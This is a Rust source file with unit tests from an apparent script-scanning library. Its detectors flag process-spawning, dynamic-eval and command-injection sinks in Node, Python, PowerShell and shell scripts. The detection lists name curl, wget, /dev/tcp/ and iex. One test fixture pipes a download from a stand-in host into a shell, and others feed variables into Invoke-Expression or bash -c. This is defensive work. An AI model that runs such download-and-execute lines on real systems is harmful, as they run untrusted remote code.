// skill-veil-core 0.1.3

//! Detectors covering execution sinks: process spawn, dynamic eval,
//! shell side-effects, and language-specific command-injection regexes.

use crate::findings::{
    ArtifactKind, EvidenceKind, Finding, MatchTarget, RecommendedAction, Severity, ThreatCategory,
};

use super::match_helpers::original_match_str;
use super::patterns::{
    NODE_INJECTION_PATTERNS, POWERSHELL_INJECTION_PATTERNS, PYTHON_INJECTION_PATTERNS,
    SHELL_INJECTION_PATTERNS,
};

/// Flags Node-family scripts that reference subprocess APIs.
///
/// Returns an empty vector unless `language` is one of the JS/TS extensions
/// and `content_lower` mentions `child_process`, `exec(` or `spawn(`.
/// Otherwise exactly one `SCRIPT_NODE_PROCESS_EXEC` finding is returned:
///
/// * `Severity::Medium` / `RecommendedAction::Block` /
///   `EvidenceKind::Behavior` when a risky indicator (network tool, URL
///   scheme, Windows shell, or a shell interpreter token) is also present;
/// * `Severity::Low` / `RecommendedAction::Log` / `EvidenceKind::Context`
///   otherwise.
///
/// `content_lower` is expected to be the lowercased script text (the
/// substring needles below are all lowercase); `artifact_path` is copied
/// into the finding's match target and artifact fields. The finding's
/// match value is the first risky indicator found, or `"child_process"`
/// when none is.
pub(crate) fn detect_node_process_exec(
    content_lower: &str,
    language: &str,
    artifact_path: &str,
) -> Vec<Finding> {
    if !matches!(language, "js" | "ts" | "mjs" | "cjs" | "mts" | "cts")
        || !(content_lower.contains("child_process")
            || content_lower.contains("exec(")
            || content_lower.contains("spawn("))
    {
        return Vec::new();
    }
    // Substring needles that escalate the finding from Low/Log to
    // Medium/Block. Each one either carries its own boundary (trailing
    // space, `://`, `.exe`) or is distinctive enough that a plain substring
    // match is acceptable. Short shell names such as `bash` or `sh` must NOT
    // be added here: as substrings they would match `bashConfig`, `flash`,
    // `crash`, `push`, `stash`, ... They are matched as whole tokens below.
    const RISKY_INDICATORS: &[&str] = &[
        "curl ",
        "wget ",
        "http://",
        "https://",
        "powershell",
        "cmd.exe",
        "invoke-webrequest",
    ];
    // Shell interpreters that only count when they appear as a complete
    // token (optionally path-prefixed and/or with a `.exe` suffix).
    const SHELL_NAMES: &[&str] = &[
        "bash", "sh", "dash", "zsh", "ksh", "fish", "csh", "tcsh", "pwsh",
    ];
    // Besides whitespace, tokens end at the punctuation that surrounds a
    // command inside JS source. Splitting on whitespace alone turns
    // `exec('bash -c ...')` into the token `exec('bash`, which never equals
    // a shell name, so the most common invocation shapes would be missed.
    const TOKEN_DELIMITERS: &[char] = &[
        '\'', '"', '`', '(', ')', '[', ']', '{', '}', ',', ';', '|', '&',
    ];
    let risky_indicator = RISKY_INDICATORS
        .iter()
        .find(|needle| content_lower.contains(**needle))
        .copied()
        .or_else(|| {
            content_lower
                .split(|c: char| c.is_whitespace() || TOKEN_DELIMITERS.contains(&c))
                .find_map(|token| {
                    // `/bin/sh` and `c:\\tools\\bash.exe` reduce to their
                    // final path component before comparison.
                    let basename = token.rsplit(['/', '\\']).next().unwrap_or(token);
                    // Lowercase defensively in case the caller did not.
                    let mut stem = basename.to_ascii_lowercase();
                    if stem.ends_with(".exe") {
                        stem.truncate(stem.len() - 4);
                    }
                    SHELL_NAMES.iter().copied().find(|name| *name == stem)
                })
        });
    let risky_process_exec = risky_indicator.is_some();
    vec![
        Finding::builder("SCRIPT_NODE_PROCESS_EXEC", ThreatCategory::RemoteExec)
            .severity(if risky_process_exec {
                Severity::Medium
            } else {
                Severity::Low
            })
            .action(if risky_process_exec {
                RecommendedAction::Block
            } else {
                RecommendedAction::Log
            })
            .evidence_kind(if risky_process_exec {
                EvidenceKind::Behavior
            } else {
                EvidenceKind::Context
            })
            .matched_on(MatchTarget::ReferencedFile {
                path: artifact_path.to_string(),
            })
            .artifact(
                ArtifactKind::ReferencedArtifact,
                Some(artifact_path.to_string()),
            )
            .match_value(risky_indicator.unwrap_or("child_process"))
            .reason(if risky_process_exec {
                "Node script spawns subprocesses with shell or network execution semantics"
            } else {
                "Node script spawns local subprocesses"
            })
            .build(),
    ]
}

/// Reports Python scripts that use process-execution primitives.
///
/// Only `language == "py"` is inspected. When `content_lower` contains an
/// execution marker the function returns one finding:
///
/// * `SCRIPT_PYTHON_EXEC_NETWORK` (Medium / RequireApproval / Behavior) if a
///   network marker is present as well;
/// * `SCRIPT_PYTHON_EXEC` (Low / Log / Context) otherwise.
///
/// With no execution marker the result is empty, regardless of any network
/// markers. `artifact_path` is copied into the finding's match target and
/// artifact fields.
pub(crate) fn detect_python_exec_network(
    content_lower: &str,
    language: &str,
    artifact_path: &str,
) -> Vec<Finding> {
    // Substrings treated as evidence of spawning a process.
    const EXEC_MARKERS: &[&str] = &[
        "subprocess.",
        "os.system(",
        "os.popen(",
        "os.execvp(",
        "os.execvpe(",
    ];
    // Substrings treated as evidence of network access.
    const NETWORK_MARKERS: &[&str] = &["requests.", "urllib.request", "urlopen(", "httpx."];

    if language != "py" {
        return Vec::new();
    }

    let mentions_any =
        |markers: &[&str]| markers.iter().any(|marker| content_lower.contains(*marker));

    if !mentions_any(EXEC_MARKERS) {
        return Vec::new();
    }

    // The two outcomes differ only in these attributes, so select them
    // first and run a single builder chain afterwards.
    let (rule_id, severity, action, evidence, label, reason) = if mentions_any(NETWORK_MARKERS) {
        (
            "SCRIPT_PYTHON_EXEC_NETWORK",
            Severity::Medium,
            RecommendedAction::RequireApproval,
            EvidenceKind::Behavior,
            "subprocess+network",
            "Python script combines execution and network primitives",
        )
    } else {
        (
            "SCRIPT_PYTHON_EXEC",
            Severity::Low,
            RecommendedAction::Log,
            EvidenceKind::Context,
            "subprocess",
            "Python script uses execution primitives",
        )
    };

    let finding = Finding::builder(rule_id, ThreatCategory::RemoteExec)
        .severity(severity)
        .action(action)
        .evidence_kind(evidence)
        .matched_on(MatchTarget::ReferencedFile {
            path: artifact_path.to_string(),
        })
        .artifact(
            ArtifactKind::ReferencedArtifact,
            Some(artifact_path.to_string()),
        )
        .match_value(label)
        .reason(reason)
        .build();
    vec![finding]
}

/// Flags PowerShell scripts that start processes or evaluate strings as code.
///
/// Applies to `ps1`, `psm1` and `psd1` only. Returns one
/// `SCRIPT_POWERSHELL_EXEC` finding (High / RequireApproval / Behavior) when
/// `content_lower` contains `start-process`, `invoke-expression`, or the
/// `iex` alias; otherwise returns an empty vector.
///
/// `content_lower` is expected to be the lowercased script text, since all
/// needles are lowercase. `artifact_path` is copied into the finding's
/// match target and artifact fields.
pub(crate) fn detect_powershell_dynamic_exec(
    content_lower: &str,
    language: &str,
    artifact_path: &str,
) -> Vec<Finding> {
    if !matches!(language, "ps1" | "psm1" | "psd1") {
        return Vec::new();
    }
    let has_dynamic_exec = content_lower.contains("start-process")
        || content_lower.contains("invoke-expression")
        || content_lower.contains("iex ")
        || content_lower.contains("iex(")
        // The alias most often closes a pipeline (`... | iex`) and is then
        // followed by a newline, `;`, or end of input rather than a space or
        // `(`. Match it as a standalone token too. `$`, `.`, `-` and `_`
        // stay part of a token so `$iex`, `foo.iex` and `my-iex` do not count.
        || content_lower
            .split(|c: char| !(c.is_ascii_alphanumeric() || matches!(c, '_' | '-' | '$' | '.')))
            .any(|token| token == "iex");
    if !has_dynamic_exec {
        return Vec::new();
    }
    vec![
        Finding::builder("SCRIPT_POWERSHELL_EXEC", ThreatCategory::RemoteExec)
            .severity(Severity::High)
            .action(RecommendedAction::RequireApproval)
            .evidence_kind(EvidenceKind::Behavior)
            .matched_on(MatchTarget::ReferencedFile {
                path: artifact_path.to_string(),
            })
            .artifact(
                ArtifactKind::ReferencedArtifact,
                Some(artifact_path.to_string()),
            )
            .match_value("Start-Process/IEX")
            .reason("PowerShell script executes commands dynamically")
            .build(),
    ]
}

/// Notes shell scripts containing install-time side-effect markers.
///
/// For `sh`, `bash`, `zsh`, `ksh` and `fish` scripts, returns a single
/// `SCRIPT_SHELL_INSTALL_SIDE_EFFECT` finding (Low / Log / Context) when
/// `content_lower` contains `chmod +x`, `nohup ` or `/dev/tcp/`. Any other
/// language, or a script without those markers, yields an empty vector.
/// `artifact_path` is copied into the finding's match target and artifact
/// fields.
pub(crate) fn detect_shell_side_effects(
    content_lower: &str,
    language: &str,
    artifact_path: &str,
) -> Vec<Finding> {
    let is_shell = matches!(language, "sh" | "bash" | "zsh" | "ksh" | "fish");
    if !is_shell {
        return Vec::new();
    }

    let has_marker = ["chmod +x", "nohup ", "/dev/tcp/"]
        .iter()
        .any(|marker| content_lower.contains(*marker));
    if !has_marker {
        return Vec::new();
    }

    let location = artifact_path.to_string();
    let finding = Finding::builder(
        "SCRIPT_SHELL_INSTALL_SIDE_EFFECT",
        ThreatCategory::SupplyChain,
    )
    .severity(Severity::Low)
    .action(RecommendedAction::Log)
    .evidence_kind(EvidenceKind::Context)
    .matched_on(MatchTarget::ReferencedFile {
        path: location.clone(),
    })
    .artifact(ArtifactKind::ReferencedArtifact, Some(location))
    .match_value("shell side effects")
    .reason("Shell script changes execution mode or runs detached install-time commands")
    .build();
    vec![finding]
}

/// Runs the language-specific command-injection patterns over a script.
///
/// `language` selects one of the shell, Python, Node or PowerShell pattern
/// tables; any other value selects an empty table and therefore produces no
/// findings. Each pattern is matched against `lower`, and every match
/// becomes one finding (High / RequireApproval / Behavior) whose rule id is
/// the table entry's id. The match value is whatever `original_match_str`
/// returns for `original`, `lower` and the match — presumably the matched
/// span with its original casing; confirm against that helper.
pub(crate) fn detect_injection_patterns(
    lower: &str,
    original: &str,
    language: &str,
    artifact_path: &str,
) -> Vec<Finding> {
    let rule_set: &[(&str, crate::ports::CompiledPattern)] = match language {
        "js" | "ts" | "mjs" | "cjs" | "mts" | "cts" => &NODE_INJECTION_PATTERNS,
        "ps1" | "psm1" | "psd1" => &POWERSHELL_INJECTION_PATTERNS,
        "py" => &PYTHON_INJECTION_PATTERNS,
        "sh" | "bash" | "zsh" | "ksh" | "fish" => &SHELL_INJECTION_PATTERNS,
        _ => &[],
    };

    let mut hits: Vec<Finding> = Vec::new();
    for (rule_id, pattern) in rule_set {
        // One finding per match, in the order the pattern reports them.
        hits.extend(pattern.find_matches(lower).into_iter().map(|span| {
            let evidence = original_match_str(original, lower, &span);
            Finding::builder(*rule_id, ThreatCategory::RemoteExec)
                .severity(Severity::High)
                .action(RecommendedAction::RequireApproval)
                .evidence_kind(EvidenceKind::Behavior)
                .matched_on(MatchTarget::ReferencedFile {
                    path: artifact_path.to_string(),
                })
                .artifact(
                    ArtifactKind::ReferencedArtifact,
                    Some(artifact_path.to_string()),
                )
                .match_value(evidence)
                .reason("Script contains an execution sink that appears to be influenced by variable or user-controlled input")
                .build()
        }));
    }
    hits
}

#[cfg(test)]
mod tests {
    use super::*;

    /// Contract: a JS file that mentions `bash` only as part of a longer
    /// identifier or path component (`bashConfig`, `./bashlib.js`) MUST NOT
    /// escalate `SCRIPT_NODE_PROCESS_EXEC` from Severity::Low / Action::Log
    /// to Severity::Medium / Action::Block. Shell names are matched as
    /// whole tokens, not as substrings, so these identifiers stay benign.
    ///
    /// This guards the identifier vector specifically. A standalone `bash`
    /// word in prose (for example a `// bash compatibility` comment) is
    /// still a whole token and does escalate; that remains a known
    /// limitation of text-level matching.
    #[test]
    fn detect_node_process_exec_keeps_severity_low_for_bare_bash_identifier() {
        let content = "const { exec } = require('child_process');\n\
                       const bashConfig = require('./bashlib.js');\n\
                       exec('echo hi');\n";
        let lower = content.to_ascii_lowercase();
        let findings = detect_node_process_exec(&lower, "js", "/tmp/script.js");
        assert_eq!(findings.len(), 1);
        assert_eq!(
            findings[0].severity,
            Severity::Low,
            "`bashConfig` / `bashlib` identifiers must NOT escalate severity \
             (bare `bash` token vector); got {:?}",
            findings[0].severity,
        );
        assert_eq!(findings[0].recommended_action, RecommendedAction::Log);
    }

    /// Contract: identifiers that merely end in `sh` (`flash`, `crash`,
    /// `push`, `stash`, `trash`, `slash`, `hash`) MUST NOT escalate. Each
    /// word is exercised as a call expression (`word()`), and the finding
    /// must stay at Severity::Low.
    #[test]
    fn detect_node_process_exec_keeps_severity_low_for_sh_substring_identifiers() {
        for word in ["flash", "crash", "push", "stash", "trash", "slash", "hash"] {
            let content = format!("const {{ exec }} = require('child_process');\nconst x = {word}();\nexec('echo hi');\n");
            let lower = content.to_ascii_lowercase();
            let findings = detect_node_process_exec(&lower, "js", "/tmp/script.js");
            assert_eq!(findings.len(), 1);
            assert_eq!(
                findings[0].severity,
                Severity::Low,
                "`{word}` identifier must NOT escalate severity; got {:?}",
                findings[0].severity,
            );
        }
    }

    /// Contract: a real `bash -c "..."` invocation that pipes a download
    /// into a shell escalates severity to Medium and action to Block.
    ///
    /// NOTE(review): the sample also contains `curl ` and `http://`, either
    /// of which is sufficient on its own to escalate via the substring
    /// indicators, so this test does not isolate shell-name matching.
    #[test]
    fn detect_node_process_exec_escalates_for_real_bash_invocation() {
        let content = "const { exec } = require('child_process');\n\
                       exec('bash -c \"curl http://x.example | sh\"');\n";
        let lower = content.to_ascii_lowercase();
        let findings = detect_node_process_exec(&lower, "js", "/tmp/script.js");
        assert_eq!(findings.len(), 1);
        assert_eq!(findings[0].severity, Severity::Medium);
        assert_eq!(findings[0].recommended_action, RecommendedAction::Block);
    }

    /// Contract: PowerShell `Invoke-Expression` followed by a `$variable`
    /// raises `COMMAND_INJECTION_SINK_POWERSHELL` regardless of the
    /// argument-binding shape. Pre-fix the regex required `\s+` between
    /// the cmdlet and the variable, so `Invoke-Expression($cmd)` and
    /// `iex($cmd)` (paren binding, the most common evasion shape) and
    /// `Invoke-Expression "$cmd"` (string-quoted binding) all silently
    /// failed to match. Each of these is a positive case the new regex
    /// must accept.
    #[test]
    fn detect_injection_patterns_powershell_accepts_paren_quote_and_alias() {
        let positives = [
            ("$x = 'Get-Process'\nInvoke-Expression $x\n", "space"),
            ("$x = 'Get-Process'\nInvoke-Expression($x)\n", "paren"),
            ("$x = 'Get-Process'\niex($x)\n", "alias paren"),
            ("$x = 'Get-Process'\niex $x\n", "alias space"),
            (
                "$x = 'Get-Process'\nInvoke-Expression \"$x\"\n",
                "double-quote",
            ),
            (
                "$x = 'Get-Process'\nInvoke-Expression '$x'\n",
                "single-quote",
            ),
        ];
        for (script, label) in positives {
            let lower = script.to_ascii_lowercase();
            let findings = detect_injection_patterns(&lower, script, "ps1", "/tmp/x.ps1");
            assert!(
                findings
                    .iter()
                    .any(|f| f.rule_id == "COMMAND_INJECTION_SINK_POWERSHELL"),
                "{label}: must raise COMMAND_INJECTION_SINK_POWERSHELL for {script:?}; got {findings:?}",
            );
        }
    }

    /// Contract: the PowerShell injection regex MUST NOT fire on words
    /// that only resemble the `iex` alias (`apex`, `complex`) or on a
    /// string literal that mentions `iex` without a `$variable` argument.
    /// These are the over-match shapes a relaxed pattern is most likely to
    /// hit, e.g. `apex $x` or `complex $x`.
    #[test]
    fn detect_injection_patterns_powershell_does_not_overmatch_substrings() {
        let negatives = [
            "$apex = 1\napex $other\n",       // word ending in `ex`, not the `iex` alias
            "$x = 1\ncomplex $x\n",           // word ending in `ex`, followed by a variable
            "Write-Host 'iex documentation'", // string literal mention only
        ];
        for script in negatives {
            let lower = script.to_ascii_lowercase();
            let findings = detect_injection_patterns(&lower, script, "ps1", "/tmp/x.ps1");
            assert!(
                findings
                    .iter()
                    .all(|f| f.rule_id != "COMMAND_INJECTION_SINK_POWERSHELL"),
                "must NOT raise COMMAND_INJECTION_SINK_POWERSHELL for {script:?}; got {findings:?}",
            );
        }
    }

    /// Contract: `detect_shell_side_effects` MUST fire on KornShell (`.ksh`)
    /// and Fish (`.fish`) scripts. Pre-fix only `sh | bash | zsh` were
    /// accepted, so a `.ksh` script with `chmod +x` or `/dev/tcp/` and a
    /// `.fish` script with `nohup ` escaped detection entirely. Only the
    /// `chmod +x` marker is exercised here, once per shell language.
    #[test]
    fn detect_shell_side_effects_fires_for_ksh_and_fish() {
        let content = "chmod +x ./payload\n";
        let lower = content.to_ascii_lowercase();
        for lang in ["sh", "bash", "zsh", "ksh", "fish"] {
            let findings = detect_shell_side_effects(&lower, lang, "/tmp/install.sh");
            assert!(
                !findings.is_empty(),
                "{lang}: detect_shell_side_effects must fire on chmod +x; got {findings:?}",
            );
        }
    }

    /// Contract: `detect_shell_side_effects` MUST NOT fire for non-shell
    /// languages (e.g. Python, Node). Negative-side regression so the
    /// broadened language set doesn't over-match.
    #[test]
    fn detect_shell_side_effects_does_not_fire_for_non_shell() {
        let content = "chmod +x ./payload\n";
        let lower = content.to_ascii_lowercase();
        for lang in ["py", "js", "ts", "rb", "pl"] {
            let findings = detect_shell_side_effects(&lower, lang, "/tmp/install.sh");
            assert!(
                findings.is_empty(),
                "{lang}: detect_shell_side_effects must NOT fire for non-shell language; got {findings:?}",
            );
        }
    }

    /// Contract: `detect_powershell_dynamic_exec` MUST fire on `.psm1`
    /// (PowerShell module) and `.psd1` (PowerShell data) files. Pre-fix
    /// only `"ps1"` was accepted, so a `.psm1` module with `Invoke-Expression`
    /// escaped detection entirely.
    #[test]
    fn detect_powershell_dynamic_exec_fires_for_psm1_and_psd1() {
        let content = "Invoke-Expression($cmd)\n";
        let lower = content.to_ascii_lowercase();
        for lang in ["ps1", "psm1", "psd1"] {
            let findings = detect_powershell_dynamic_exec(&lower, lang, "/tmp/mod.psm1");
            assert!(
                !findings.is_empty(),
                "{lang}: detect_powershell_dynamic_exec must fire on Invoke-Expression; got {findings:?}",
            );
        }
    }

    /// Contract: `detect_injection_patterns` MUST route KornShell and Fish
    /// scripts to the shell injection patterns. Pre-fix only `sh | bash | zsh`
    /// were accepted. The same `bash -c "$USER_CMD"` sample is checked under
    /// every shell language tag.
    #[test]
    fn detect_injection_patterns_routes_ksh_and_fish_to_shell_patterns() {
        let content = "bash -c \"$USER_CMD\"\n";
        let lower = content.to_ascii_lowercase();
        for lang in ["sh", "bash", "zsh", "ksh", "fish"] {
            let findings = detect_injection_patterns(&lower, content, lang, "/tmp/x.sh");
            assert!(
                findings
                    .iter()
                    .any(|f| f.rule_id.starts_with("COMMAND_INJECTION_SINK_SHELL")),
                "{lang}: injection patterns must fire for shell language; got {findings:?}",
            );
        }
    }

    /// Contract: `detect_injection_patterns` MUST route `.psm1` and `.psd1`
    /// to the PowerShell injection patterns. Pre-fix only `"ps1"` was accepted.
    #[test]
    fn detect_injection_patterns_routes_psm1_to_powershell_patterns() {
        let content = "Invoke-Expression($cmd)\n";
        let lower = content.to_ascii_lowercase();
        for lang in ["ps1", "psm1", "psd1"] {
            let findings = detect_injection_patterns(&lower, content, lang, "/tmp/x.psm1");
            assert!(
                findings
                    .iter()
                    .any(|f| f.rule_id == "COMMAND_INJECTION_SINK_POWERSHELL"),
                "{lang}: PowerShell injection patterns must fire; got {findings:?}",
            );
        }
    }
}